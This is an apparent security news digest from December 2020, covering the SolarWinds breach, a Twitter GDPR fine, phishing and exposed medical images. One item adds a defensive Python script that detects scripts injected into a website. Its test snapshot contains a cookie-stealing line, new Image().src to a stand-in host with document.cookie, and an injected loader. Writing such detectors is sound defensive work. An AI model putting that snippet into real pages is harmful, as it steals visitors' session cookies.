Security daily (15-12-2020)

SolarWinds breach has industrial firms checking their networks for vulnerabilities

Executives from multiple U.S. electric utilities convened a phone call on Monday to discuss a critical vulnerability in software made by SolarWinds, the federal contractor at the heart of an apparent cyber-espionage operation. The briefing, hosted by an industry-government group known as the Electricity Subsector Coordinating Council, is just one example of the wide ripple effects of the malicious tampering with SolarWinds’ software by suspected state-sponsored hackers. The SolarWinds compromise has reportedly led to breaches of multiple U.S. federal agencies, including the departments of Treasury and Homeland Security. The affected software is widely used in the electricity, oil and gas, and manufacturing sectors, and the process of assessing some organizations’ exposure to the bug has only just started. “We have to make sure we’re breaking down some of these concepts so they understand the impact to them as critical infrastructure owners and operators,” said one U.S. official involved in […] (CyberScoop)

National security officials brief Biden team on SolarWinds hacking campaign

U.S. national security officials have briefed the transition team for President-elect Joe Biden and Capitol Hill aides on the consequences of a suspected government-backed hacking campaign affecting multiple federal agencies, according to multiple people familiar with the matter. Trump administration officials held several briefings on the topic for Biden aides on Monday, and a classified briefing is slated for Tuesday, according to a person familiar with the briefings. Among the agencies briefing Biden staff on Monday was the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, a CISA official said. The hacking campaign, which the Washington Post reported as being tied to Russia, forced an emergency meeting of the White House National Security Council and prompted some lawmakers to call for new approaches to defending U.S. companies from malicious cyber activity. Responding to the apparent cyber-espionage effort could be one of the first big tests of Biden’s cybersecurity […] (CyberScoop)

Here comes the bride: New map matches threat intel to cyberdefenses

A project announced Tuesday maps the National Institute of Standards and Technology’s Cybersecurity Framework, a risk-management tool that organizations lean on to reduce their cybersecurity risks, onto the MITRE ATT&CK framework, the catalogue of adversary behaviour that cyber pros consult when they analyze hacking groups, in a way its backers think any organization can use. The mapping comes with backing from big players: JPMorgan Chase, a nonprofit center operated by an offshoot of MITRE, the cybersecurity company AttackIQ and the nonprofit Center for Internet Security, which is perhaps best known for its work with state and local governments. The idea is to harmonize the risk-management side of cyber with the threat-intelligence side, via models that any organization can employ. Usually unifying those two sides would be something that only a large outfit, like the U.S. military or a major investment bank, would be able to pull off, […] (CyberScoop)

Twitter fined nearly $550,000 in Europe for response to bug that exposed private tweets

Regulators in Ireland have fined Twitter for failing to report a data breach promptly and for not adequately documenting the incident, marking the first time the regulator has penalized a “big tech” company for violations of Europe’s data protection law. The fine of 450,000 euros, or about $550,000, stems from a bug that allowed thousands of people’s private tweets to be made public between late 2014 and early 2019, when Twitter reported the problem to European authorities; the GDPR requires a controller to notify its supervisory authority within 72 hours of becoming aware of a breach. The social media company said it could only identify the specific users affected from September 2017 onward, about 89,000 in total over that stretch. The bug affected only users of Twitter’s Android app. Ireland’s Data Protection Commission, which acts as Twitter’s lead supervisory authority under the EU’s General Data Protection Regulation (GDPR), issued the decision Tuesday. Twitter’s European headquarters are in Ireland, as are those of Google, Facebook and several other multibillion-dollar U.S. […] (CyberScoop)

Naked Security Live – How to avoid “big brand” email scams

Here's the latest Naked Security video - watch now (and please share with your friends)! (Naked Security)

Phishing tricks that really work – and how to avoid them

Get inside the mindset of your adversaries to increase your chances of spotting a phish. (Naked Security)

DHS Among Those Hit In Sophisticated Cyberattack By Foreign Adversaries

(News ≈ Packet Storm)

Spotify Notifies Customers Of Breach, Files Under CCPA

(News ≈ Packet Storm)

Hospitals Are Leaving Millions Of Sensitive Medical Images Exposed Online

(News ≈ Packet Storm)

18k Customers Downloaded The SolarWinds Backdoored Software

(News ≈ Packet Storm)

Why You Should Monitor Your Website

To keep unauthorized access, or to profit from a website’s environment long after the initial compromise, attackers commonly rely on a variety of techniques. These range from adding backdoors and stealing sensitive data to redirecting the site to third-party resources, or injecting specially crafted links to give their own sites a search-ranking (SERP) boost. Knowing exactly which JavaScript files are supposed to load whenever you visit your website is good practice, and in many cases a reliable way to tell that your site has been compromised: an injected loader or inline snippet shows up as a script the page never used to have. (Sucuri Blog)
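A minimal version of that check, added here as a worked example rather than code from the Sucuri post: it records the absolute URL of every external script and a SHA-256 of every inline script body in a snapshot of the page taken when it was known to be clean, then diffs a later snapshot against that baseline. The site URL, both HTML snapshots and the injected loader and cookie-stealing snippet are constructed for the example; the only library used is the Python standard library.

```python
"""Script-inventory check for a web page.

Added example (not Sucuri's code): build a baseline of the scripts a page
loads while it is known to be clean, then diff a later snapshot against it.
Every external <script src> is stored as an absolute URL and every inline
script body as a SHA-256 hash, so an injected loader or inline snippet
appears as a new entry. All HTML below is constructed for illustration.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptCollector(HTMLParser):
    """Collects external script URLs and hashes of inline script bodies."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.external = set()       # absolute URLs of <script src=...>
        self.inline_hashes = set()  # sha256 hex of each inline script body
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            # urljoin resolves relative paths and protocol-relative "//cdn..." URLs
            self.external.add(urljoin(self.base_url, src))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf).strip()
            if body:
                digest = hashlib.sha256(body.encode("utf-8")).hexdigest()
                self.inline_hashes.add(digest)
            self._in_script = False


def build_baseline(html, base_url):
    """Return (external_urls, inline_hashes) for a page known to be clean."""
    parser = ScriptCollector(base_url)
    parser.feed(html)
    parser.close()
    return frozenset(parser.external), frozenset(parser.inline_hashes)


def audit_page(html, base_url, baseline):
    """Diff a fresh snapshot against the baseline; return a list of findings."""
    expected_external, expected_inline = baseline
    external, inline = build_baseline(html, base_url)
    site_host = urlsplit(base_url).hostname
    findings = []
    for url in sorted(external - expected_external):
        origin = "same-origin" if urlsplit(url).hostname == site_host else "third-party"
        findings.append(f"unexpected {origin} script: {url}")
    for digest in sorted(inline - expected_inline):
        findings.append(f"unexpected inline script: sha256 {digest}")
    for url in sorted(expected_external - external):
        # A script that disappears can mean a legitimate file was replaced
        findings.append(f"expected script missing: {url}")
    return findings


BASE_URL = "https://www.example.com/"  # assumed site for the example

# Constructed snapshot of the page taken when it was known to be clean.
KNOWN_GOOD_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body><p>Hello</p></body></html>"""

# Constructed later snapshot: a third-party loader and an inline snippet
# have been injected, the pattern the Sucuri post describes.
CURRENT_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="//cdn.example.net/assets/loader.js"></script>
</head><body><p>Hello</p>
<script>new Image().src = 'https://example.org/c?' + document.cookie;</script>
</body></html>"""

if __name__ == "__main__":
    baseline = build_baseline(KNOWN_GOOD_HTML, BASE_URL)
    for finding in audit_page(CURRENT_HTML, BASE_URL, baseline):
        print(finding)
```

Two caveats when running this against a live site: take the baseline from a copy you trust (the theme and plugin files in version control, or a snapshot taken immediately after a clean install), not from whatever the server happens to serve today, and fetch the later snapshots the way a visitor would, from outside the server and with a normal browser user agent, because injected code is often served only to certain visitors, referrers or user agents and will not appear in the files on disk or in a request from localhost. Inline scripts whose content legitimately changes on every request (a nonce, a JSON-LD block with the current date) will need to be excluded from the inline hash set or the check will page you for nothing.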

Subway Sandwich Loyalty-Card Users Suffer Ham-Handed Phishing Scam

Subway loyalty program members in U.K. and Ireland have been sent scam emails to trick them into downloading malware. (Threatpost)

Easy WP SMTP Security Bug Can Reveal Admin Credentials

A poorly configured file opens users up to site takeover. (Threatpost)

Gitpaste-12 Worm Widens Set of Exploits in New Attacks

The worm returned in recent attacks against web applications, IP cameras and routers. (Threatpost)

Firefox Patches Critical Mystery Bug, Also Impacting Google Chrome

Mozilla Foundation releases Firefox 84 browser, fixing several flaws and delivering performance gains and Apple processor support. (Threatpost)

45 Million Medical Images Left Exposed Online

A six-month investigation by CybelAngel discovered unsecured sensitive patient data available for third parties to access for blackmail, fraud or other nefarious purposes. (Threatpost)

Agent Tesla Keylogger Gets Data Theft and Targeting Update

The infamous keylogger has shifted its targeting tactics and now collects stored credentials for less-popular web browsers and email clients. (Threatpost)

Millions of Unpatched IoT, OT Devices Threaten Critical Infrastructure

Industrial, factory and medical gear remain largely unpatched when it comes to the URGENT/11 and CDPwn groups of vulnerabilities. (Threatpost)


/security-daily/ 16-12-2020 23:44:24